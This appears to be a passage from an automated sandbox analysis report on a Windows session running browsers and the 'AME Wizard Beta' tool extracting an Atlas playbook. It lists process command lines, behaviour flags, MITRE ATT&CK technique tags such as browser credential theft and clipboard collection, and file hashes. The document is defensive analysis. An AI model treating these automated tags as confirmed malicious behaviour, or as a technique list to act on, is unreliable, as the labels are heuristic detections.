  PID:6136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:5248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2324 /prefetch:8
  2⤵
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3408,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4712,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4620,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa20f5cc40,0x7ffa20f5cc4c,0x7ffa20f5cc58
  2⤵
  PID:5760

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3752

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa20f5cc40,0x7ffa20f5cc4c,0x7ffa20f5cc58
  2⤵
  PID:1636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2016 /prefetch:2
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1936,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:8
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:3100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4848,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4072 /prefetch:8
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:8
  2⤵
  PID:3604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5080 /prefetch:8
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4956 /prefetch:8
  2⤵
  PID:3112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5192,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5396,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5460 /prefetch:2
  2⤵
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4880,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5600,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5620,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:5700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3204,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5872 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4424,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5696,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:5376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3304,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:8
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5072,i,17372064245543014780,4799979130999455288,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  PID:3232

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1000

C:\Users\Admin\Downloads\AME Wizard Beta\AME Wizard Beta.exe
"C:\Users\Admin\Downloads\AME Wizard Beta\AME Wizard Beta.exe"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6076
- C:\Users\Admin\Downloads\AME Wizard Beta\AME Wizard Beta.exe
  "C:\Users\Admin\Downloads\AME Wizard Beta\AME Wizard Beta.exe" "C:\Users\Admin\AppData\Local\Temp\AME" Interprocess Administrator --Mode TwoWay --Nodes Level=User:ProcessID=6076 --Host 6076
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:6052
- C:\Users\Admin\AppData\Local\Temp\AME\7za.exe
  "C:\Users\Admin\AppData\Local\Temp\AME\7za.exe" x "C:\Users\Admin\Downloads\AtlasPlaybook_v0.4.1\AtlasPlaybook_v0.4.1.apbx" -o"C:\Users\Admin\AppData\Local\Temp\AtlasPlaybook_v0.4.1-51685" -p"malte" "playbook.*" "Images" -y -r-
  2⤵
  - Executes dropped EXE
  PID:5568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault81c23176h888eh4603h8ef2hcd4d09cfa6a7
1⤵
PID:2024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa185746f8,0x7ffa18574708,0x7ffa18574718
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,12510120548634316216,17452598471382879659,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,12510120548634316216,17452598471382879659,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,12510120548634316216,17452598471382879659,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
  2⤵
  PID:2036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:3408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa185746f8,0x7ffa18574708,0x7ffa18574718
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  PID:5248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
  2⤵
  PID:5500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:6608
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3604 /prefetch:8
  2⤵
  PID:6892
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3604 /prefetch:8
  2⤵
  PID:6908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:7004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15149325697793360442,14479955590931714933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:7012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\4e5a0a78-f13b-4de8-a936-76625a0cce8b.tmp

Filesize
230KB

MD5
56ea8d6c4c52c8b3e5a23ef8105884e8

SHA1
52ec0737eb5b20fcb448643d2a3e8676b8a2001e

SHA256
6fbb84bc0dc575495207737b59a6d21abce987597d33b59295050f03a6c5b8ef

SHA512
0df92f4639b10bd36c4a2c577b59486871396e727d7d757b16568fc5d975f81b50e144c9425384227cd6d59b14afb7a5e0a7869991682ebb374332420a4966e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
9e930267525529064c3cccf82f7f630d

SHA1
9cdf349a8e5e2759aeeb73063a414730c40a5341

SHA256
1cf7df0f74ee0baaaaa32e44c197edec1ae04c2191e86bf52373f2a5a559f1ac

SHA512
dbc7db60f6d140f08058ba07249cc1d55127896b14663f6a4593f88829867063952d1f0e0dd47533e7e8532aa45e3acc90c117b8dd9497e11212ac1daa703055

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\59354a5a-d619-4ab8-b6a6-c7c660fa9e6a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8739ec43-6742-4cdc-8aeb-b0a4b7377b76.tmp

Filesize
10KB

MD5
4c4fd58c9fe5d61220a2d3ed70f5790a

SHA1
fb4c5334a70c12d3419860efd9eb6bc9d910da03

SHA256
f1dc8a3fadf61d80975334762e86785c923ed64f88c3bad313c59a19d635c782

SHA512
e169548372f3d0c474429374bed2063fec504a4214bb4bf17da824f1b4ceb92fe8d6934d2158bb77e18990e68346ced86d0229dbb75100293e4a8a56ef5f2857

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
a3d364998b2d03aa2b60331ae1fe253f

SHA1
7f99f460c2480162b88905b3ae4ae2c494a15ec9

SHA256
b0103a6c5ad3cb02fac5750db2ed601abcef4a9e000bc42314cf60bdb7926e2a

SHA512
ed53687c59507e492cbcff2dd45f31b80db2cc67a1761ed075123015434fef6660be6d2bf85b4ee60cc8d86ab6fdac34c4020ee1c774a98e8312bae31b08a747

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
360B

MD5
6e2705ef98cdb0967de4559d6cd15b68

SHA1
72508a62959528ce375706404cf538c5dcd9b1bb

SHA256
6f79f96e437fcf0184143db9c30a9913b984f6baa7c139bceaafad0e777d9b79

SHA512
83b510963afa5cb1d0085c1163bc9c304234e30188ae240cac9787c83d624b667eaecc0b1bc838e905d73d03ceed124a96e003faa6cc61d243595dde602a3cfe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
